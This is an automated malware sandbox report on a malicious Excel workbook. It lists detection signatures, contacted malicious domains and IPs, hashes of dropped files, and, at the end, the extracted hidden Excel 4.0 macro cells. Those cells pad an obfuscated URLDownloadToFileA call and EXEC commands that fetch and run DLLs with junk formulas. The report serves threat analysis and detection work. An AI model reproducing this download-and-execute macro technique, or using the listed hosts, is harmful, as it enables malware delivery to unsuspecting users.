Analysis Report documents-2112491607.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Allocates a big amount of memory (probably used for heap spraying)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Machine Learning detection for dropped file | Show sources |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) | Show sources |
Source: | File created: | Jump to behavior |
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 100% | Joe Sandbox ML | | |
| 100% | Joe Sandbox ML | | |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | Virustotal | | Browse |
| 0% | Virustotal | | Browse |
| 4% | Virustotal | | Browse |
| 2% | Virustotal | | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | Avira URL Cloud | safe | |
| 100% | Avira URL Cloud | malware | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 100% | Avira URL Cloud | malware | |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kautilyaclasses.com | 192.185.56.250 | true | false | | unknown |
bodylanguage.santulan.co.in | 111.118.215.222 | true | true | | unknown |
corwin-tommie06f.ru.com | 8.211.4.209 | true | false | | unknown |
katelynn9506a.ru.com | 8.211.4.209 | true | false | | unknown |
kullumanalitours.com | 103.211.216.55 | true | false | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | unknown |
| true | | unknown |
| false | | unknown |
| true | | unknown |
| true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | low |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
103.211.216.55 | kullumanalitours.com | Seychelles | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false |
192.185.56.250 | kautilyaclasses.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | false |
8.211.4.209 | corwin-tommie06f.ru.com | Singapore | | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false |
111.118.215.222 | bodylanguage.santulan.co.in | India | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383123 |
Start date: | 07.04.2021 |
Start time: | 09:14:09 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | documents-2112491607.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLSM@11/12@5/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
103.211.216.55 | Get hash | malicious | Browse |
| |
192.185.56.250 | Get hash | malicious | Browse |
| |
8.211.4.209 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
111.118.215.222 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
bodylanguage.santulan.co.in | Get hash | malicious | Browse |
| |
kullumanalitours.com | Get hash | malicious | Browse |
| |
corwin-tommie06f.ru.com | Get hash | malicious | Browse |
| |
kautilyaclasses.com | Get hash | malicious | Browse |
| |
katelynn9506a.ru.com | Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 138083 |
Entropy (8bit): | 5.497215326378405 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | A26AB60FB8F4C1FCB0A37955433F241B |
SHA1: | E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B |
SHA-256: | 3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6 |
SHA-512: | CA5CA64E4A7A6A366BB1335C9339D40ECC2ECC9B393AC6D0DB74FA0D995155E39286FB9FBE096C252A2AD7E33A892039960503A0DE1F9805CCDD8E197525D2AD |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | http://bodylanguage.santulan.co.in/ds/index.html |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8301 |
Entropy (8bit): | 7.970711494690041 |
Encrypted: | false |
SSDEEP: | 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh |
MD5: | D8574C9CC4123EF67C8B600850BE52EE |
SHA1: | 5547AC473B3523BA2410E04B75E37B1944EE0CCC |
SHA-256: | ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B |
SHA-512: | 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8854 |
Entropy (8bit): | 7.949751503848125 |
Encrypted: | false |
SSDEEP: | 192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj |
MD5: | 780FD0ABF9055E2D8FA1BAB6D4B9163E |
SHA1: | CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE |
SHA-256: | 6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2 |
SHA-512: | 8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96847 |
Entropy (8bit): | 7.870690149733864 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgI:GJIW9bTdS7lMHfD9ByrtyOG7ZVxET |
MD5: | 00AF2D8EB13A69B0A52ABFB800D69F9F |
SHA1: | 3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1 |
SHA-256: | 0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603 |
SHA-512: | 2214669F1315B5F60B2E300B873AC98EBF2A0C57943FCEEB4ED41D431C6D8708D5EAD2A7F2D510C45AAC2321CC45292EEE7E504CD304A618DCC65A69DEAFE226 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.489142053628293 |
Encrypted: | false |
SSDEEP: | 12:85QENcLgXg/XAlCPCHaXtB8XzB/XURvX+WnicvbRbDtZ3YilMMEpxRljK5TdJP9O:85JK/XTd6j0YeBDv3qYrNru/ |
MD5: | 9C40617F346B87D23DC5454B7267E33A |
SHA1: | B87124245ACDB8EDF4EE972366790CC463CDBDDC |
SHA-256: | 223CD23880148DA3DEC1729E43E7735385478231A1BDE95A0E89C438C420623B |
SHA-512: | 097B24FAE265EC38060C7B05B10025503D2E49FC3E099853E913841E42C6E7BB4AA0EE7EA6F39710C6533D49C3CAEA3E24E42A16D1F127587794E4CCCBE1D3E1 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2138 |
Entropy (8bit): | 4.547087478186962 |
Encrypted: | false |
SSDEEP: | 24:8bz2/XTd6jFyD2nhe8WDv3qYdM7dD2bz2/XTd6jFyD2nhe8WDv3qYdM7dV:8+/XT0jFY2nhdYQh2+/XT0jFY2nhdYQ/ |
MD5: | FD2F42E72FB642FA79B3F38914DB4B03 |
SHA1: | 96D1AD382852122C29334DFB5CE89A13DD14C8F3 |
SHA-256: | 8C69F2F1A47257D91955C5E9AC888608AA6234EEECFEAD7BCEB4B268B747ECBA |
SHA-512: | 069397B0B527C31C843AAEBF778965D48E446F0958B536D57CE7C5DA68A801C90FA90699DFBFD1C68FCC93FB06EBFA5A6BE204BAA47FD089F4597C050A8073BB |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115 |
Entropy (8bit): | 4.745678829632436 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWKS9LRzcOHZELRzcOHmxWKS9LRzcOHv:dj49Ll5ELlt9LlP |
MD5: | 153B80C9C6025C6926C8F0A15B781156 |
SHA1: | A4B5E632F8E2282BA31EF56938E23F0BAC5DAD1F |
SHA-256: | 1E02E4944F11BD25D085F2B96AECB9912DEBC942C411D1E85603DFFCF69E2F65 |
SHA-512: | 7EDD7295338EFC23F23A3B55F3AD1832A297701F58CB68AF080594D8C119BA3FBAB32BC55DCFBA231C65E40E5CA313A74217B2B8948F035ECA6979281E4165F4 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96847 |
Entropy (8bit): | 7.870690149733864 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgI:GJIW9bTdS7lMHfD9ByrtyOG7ZVxET |
MD5: | 00AF2D8EB13A69B0A52ABFB800D69F9F |
SHA1: | 3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1 |
SHA-256: | 0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603 |
SHA-512: | 2214669F1315B5F60B2E300B873AC98EBF2A0C57943FCEEB4ED41D431C6D8708D5EAD2A7F2D510C45AAC2321CC45292EEE7E504CD304A618DCC65A69DEAFE226 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 138083 |
Entropy (8bit): | 5.497215326378405 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | A26AB60FB8F4C1FCB0A37955433F241B |
SHA1: | E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B |
SHA-256: | 3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6 |
SHA-512: | CA5CA64E4A7A6A366BB1335C9339D40ECC2ECC9B393AC6D0DB74FA0D995155E39286FB9FBE096C252A2AD7E33A892039960503A0DE1F9805CCDD8E197525D2AD |
Malicious: | true |
Antivirus: |
|
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.8821840433354 |
TrID: |
|
File name: | documents-2112491607.xlsm |
File size: | 96877 |
MD5: | cada6b07929cd03002206f65f547f383 |
SHA1: | e4b72830f1f320d711f60f540a8fe9340597238e |
SHA256: | b9b231cad810dedef1d27772b12d04e8aa4e9ef0f461d5a0fbf80d3c38918860 |
SHA512: | 930c2ed9bf01b1c22189985f47800b11b2d116d5210a6f712f12ea25d7d4d52c165b7c9531d902487e341d9ebf35c4f3768ada1299b0ad9cab91d95f1b36fc15 |
SSDEEP: | 1536:4h1M4Kfra8zxQz8jbztonsBjFC6QomaIRUxPLe96bGAfe2hawno:4h1M4kra8Wz8jbzSn4BC6Qdkx60WMo |
File Content Preview: | PK..........!...`.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "documents-2112491607.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code (non-empty cells of the hidden macro sheet; empty cells omitted, and the extracted dump is cut off after the last cell) |
---|
="..\oeiwkd" |
=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL("U"&AM19&"n",AM20&"A",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM23,before.2.0.0.sheet!AO15&".dll",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245) |
=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275) |
=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL("U"&AM19&"n",AM20&"A",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM24,before.2.0.0.sheet!AO15&"1"&".dll",0,0) |
=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275) |
=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275) |
